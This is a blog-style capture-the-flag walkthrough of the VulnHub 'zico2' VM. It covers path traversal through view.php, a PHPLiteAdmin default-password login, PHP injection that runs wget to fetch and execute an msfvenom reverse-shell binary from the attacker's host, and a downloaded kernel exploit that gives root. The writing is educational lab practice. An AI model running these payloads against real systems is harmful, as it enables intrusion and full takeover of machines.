Okay, let’s give an “intermediate” CTF a shot here. Not sure what makes it harder yet, but I’m excited to get going, so let’s do this!
This Boot2Root VM is “zico2”, available from VulnHub.
The goal of this CTF is to get root and read the flag file. This VM works without issue in VirtualBox 5. Have fun!
First, as usual, nmap.
root@kali:~# nmap -sV -T4 10.13.37.206 -p- Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-08 22:33 EST Warning: 10.13.37.206 giving up on port because retransmission cap hit (6). Nmap scan report for 10.13.37.206 Host is up (0.00018s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) 111/tcp open rpcbind 2-4 (RPC #100000) 53380/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:98:69:CA (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1664.24 seconds
We’ll start with port 80. (I started a brute force ssh run in the background in the meantime, because you never know, but it came up with nothing.)
So let’s see what subdirectories gobuster comes up with.
root@kali:~# gobuster -u http://10.13.37.206 -w /usr/share/wordlists/dirb/big.txt Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.13.37.206/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/big.txt [+] Status codes : 200,204,301,302,307 ===================================================== /LICENSE (Status: 200) /css (Status: 301) /dbadmin (Status: 301) /img (Status: 301) /index (Status: 200) /js (Status: 301) /package (Status: 200) /tools (Status: 200) /vendor (Status: 301) /view (Status: 200) =====================================================
First, the root, (http://10.13.37.206). Just the start of a site, nothing interesting… except…
So, if it’s not obvious to you, it looks like maybe we’ll be able to use view.php to view files on the server.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false ntp:x:103:108::/home/ntp:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin vboxadd:x:999:1::/var/run/vboxadd:/bin/false statd:x:105:65534::/var/lib/nfs:/bin/false mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false zico:x:1000:1000:,,,:/home/zico:/bin/bash
Cool, that might end up being helpful. Plus now we have some system accounts.
Checking out the other subdirectories, nothing else looks too interesting until I hit http://10.13.37.206/dbadmin/. Inside there’s a test_db.php file, which give us a login page for PHPLiteAdmin v1.9.3.
A quick Google search show that the default password is “admin”, which isn’t changed as part of the initialization process. I’m guessing that since there are a few unfinished web frameworks here that the sys admin might not have completed setting everything up, so let’s try that. Although, who am I kidding, default passwords are always good to guess anyway.
It worked!
Looking through everything that’s here, there are a couple users (and their hashed passwords) in the test_users database, “info” table.
You can crack the passwords, they are “34kroot34” (for root), and “zico2215@” for zico. (Spoiler: I ended up not needing these, but maybe you’ll find them useful in finding another way in.)
Okay, let’s see if this has any known vulnerabilities.
It looks like it does! Long story short, if you create a database, you can specify the extension you want to use for it, and it will save that database in “/usr/databases”. So if you create a database with the “.php” extension, then you can create a table in that database with one text column, with a default value that is some valid php code, and when you view that “page” in a browser window, it will execute the PHP code. I’m not going to go into a ton of detail here, that’s what Google is for. 🙂
So I figured what I would do is the following:
- Create reverse shell executable to point back to my kali
- Share the executable via a python http server
- Start up a meterpreter listener
- Create some PHP code to download the executable, make it executable, and execute it to open the reverse shell
- Profit?
Step 1, create the reverse shell executable.
root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.13.37.237 LPORT=443 -f elf -o /tmp/rshell No encoder or badchars specified, outputting raw payload Payload size: 123 bytes Final size of elf file: 207 bytes Saved as: /tmp/rshell
Run the http server to host the file for download.
root@kali:/tmp# python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 ...
Start meterpreter reverse TCP handler.
root@kali:/tmp# systemctl start postgresql root@kali:/tmp# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.13.37.237 LHOST => 10.13.37.237 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > run [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.13.37.237:443
Create the aforementioned database/table in PHPLiteAdmin with the following default value:
'<?php system("cd /tmp; wget http://10.13.37.237:8000/rshell; chmod 777 rshell; ./rshell"); ?>'
And then navigate to the following URL to run the PHP:
http://10.13.37.206/view.php?page=../../../../usr/databases/rshell.php
Meterpreter should now look something like this. You’ll have to hit enter, and then start the interaction with the session that was opened.
msf exploit(handler) > [*] Sending stage (847604 bytes) to 10.13.37.206 [*] Meterpreter session 1 opened (10.13.37.237:443 -> 10.13.37.206:54907) at 2017-11-09 06:03:40 -0500 <hit enter> msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...
Start up a shell, and then use Python to get bash running. Because I like bash better. Then we figure out what version of the kernel we’re running, maybe we can find a privilege escalation exploit.
meterpreter > shell Process 4407 created. Channel 7 created. python -c 'import pty; pty.spawn("/bin/bash");' www-data@zico:/home/zico/wordpress$ cd /tmp cd /tmp www-data@zico:/tmp$ uname -a uname -a Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Search exploit-db.com for the kernel version, and sure enough, there’s an exploit: “vnik” Download it, compile it, and run it, as per the instructions in the source.
www-data@zico:/tmp$ wget https://www.exploit-db.com/raw/33589/ -O vnik.c wget https://www.exploit-db.com/raw/33589/ -O vnik.c --2017-11-10 03:09:10-- https://www.exploit-db.com/raw/33589/ Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8 Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 3664 (3.6K) Saving to: `vnik.c' 100%[======================================>] 3,664 --.-K/s in 0s 2017-11-10 03:09:10 (313 MB/s) - `vnik.c' saved [3664/3664] www-data@zico:/tmp$ gcc vnik.c -O2 -o vnik gcc vnik.c -O2 -o vnik www-data@zico:/tmp$ chmod 777 vnik chmod 777 vnik www-data@zico:/tmp$ ./vnik 0 ./vnik 0 IDT addr = 0xffffffff81dd7000 Using int = 3 with offset = -49063 root@zico:/tmp# id id uid=0(root) gid=0(root) groups=0(root) root@zico:/tmp# ls /root ls /root flag.txt root@zico:/tmp# cat /root/flag.txt cat /root/flag.txt # # # # ROOOOT! # You did it! Congratz! # # Hope you enjoyed! # # # #
And done! That wasn’t too hard! I did enjoy it though.
Until next time!